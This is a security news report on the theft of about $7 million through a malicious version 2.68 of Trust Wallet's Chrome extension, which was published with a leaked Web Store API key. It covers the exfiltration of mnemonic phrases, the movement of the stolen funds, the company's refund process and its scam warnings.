Trust Wallet is urging users to immediately update its Google Chrome extension to the latest release after identifying a “security incident” that resulted in the theft of roughly $7 million in assets.

The problem, according to the multi‑chain, non‑custodial cryptocurrency wallet provider, affects version 2.68. The extension has around one million users based on the Chrome Web Store listing. Users should upgrade to version 2.69 without delay.

“We’ve confirmed that approximately $7M has been impacted and we will ensure all affected users are refunded,” Trust Wallet said in a post on X. “Supporting affected users is our top priority, and we are actively finalizing the process to refund the impacted users.”

Trust Wallet is also instructing users not to engage with any messages that are not from its verified, official communication channels. Mobile-only users and all other versions of the browser extension are currently assessed as not impacted.

According to technical details shared by SlowMist, version 2.68 included malicious logic designed to enumerate every wallet stored in the extension and initiate a mnemonic phrase prompt for each one.

“The encrypted mnemonic is then decrypted using the password or passkeyPassword entered during wallet unlock,” the blockchain security firm said. “Once decrypted, the mnemonic phrase is sent to the attacker’s server api.metrics-trustwallet[.]com.”

The domain “metrics-trustwallet[.]com” was registered on December 8, 2025, with initial activity to “api.metrics-trustwallet[.]com” starting on December 21, 2025.

Subsequent analysis indicates that the attacker abused an open‑source full‑chain analytics library named posthog-js to collect and exfiltrate wallet user data.

The assets drained so far include about $3 million in Bitcoin, $431 in Solana, and over $3 million in Ethereum. The stolen value has been routed through centralized exchanges and cross-chain bridges to obfuscate origin and perform swaps. Based on an update from blockchain investigator ZachXBT, the compromise has impacted hundreds of individual wallets.

“While ~$2.8 million of the stolen funds remain in the hacker’s wallets (Bitcoin/ EVM/ Solana), the bulk – >$4M in cryptos – has been sent to CEXs [centralized exchanges]: ~$3.3 million to ChangeNOW, ~$340,000 to FixedFloat, and ~$447,000 to KuCoin,” PeckShield said.

“This backdoor incident originated from malicious source code modification within the internal Trust Wallet extension codebase (analytics logic), rather than an injected compromised third‑party dependency (e.g., malicious npm package),” SlowMist said.

“The attacker directly tampered with the application’s own code, then leveraged the legitimate PostHog analytics library as the data‑exfiltration channel, redirecting analytic traffic to an attacker‑controlled server.”

The company added that this may be the work of a nation-state actor and hypothesized that the adversary may have gained control of Trust Wallet‑associated developer endpoints or obtained deployment permissions sometime before December 8, 2025.

Changpeng Zhao, a co-founder of crypto exchange Binance, which owns the utility, suggested that the exploit was “most likely” carried out by an insider, although no corroborating evidence has been made public to support this assessment.

Update

Trust Wallet, in a follow-up communication, has asked affected users to submit a form via their support desk at “trustwallet-support.freshdesk[.]com” to initiate the compensation workflow. Victims are requested to provide a contact email address, country of residence, compromised wallet address(es), the destination address where funds were drained, and the related transaction hashes.

“We are seeing scams via Telegram ads, fake ‘compensation’ forms, impersonated support accounts, and DMs,” the company warned. “Always verify links, never share your recovery phrase, and use official Trust Wallet channels only.”

Eowyn Chen, Trust Wallet’s CEO, said an investigation into the intrusion is ongoing, reiterating that the impact is limited to Chrome browser extension version 2.68 for users who logged in on or before December 26, 2025, 11 a.m. UTC.

“The malicious extension v2.68 was NOT released through our internal manual process,” Chen said. “Our current findings suggest it was most likely published externally through the Chrome Web Store API key, bypassing our standard release checks.”

“The hacker used a leaked Chrome Web Store API key to submit the malicious extension version v2.68. This successfully passed the Chrome Web Store’s review and was released on December 24, 2025, at 12:32 p.m. UTC.”

After detecting the compromise, Chen said the company suspended the malicious domain, revoked all release APIs, and began processing reimbursements for confirmed victims.

(The story was updated after publication to incorporate the latest findings.)

Found this article useful from a security operations perspective? Follow us on Google News, Twitter and LinkedIn to keep up with more in-depth coverage and analysis.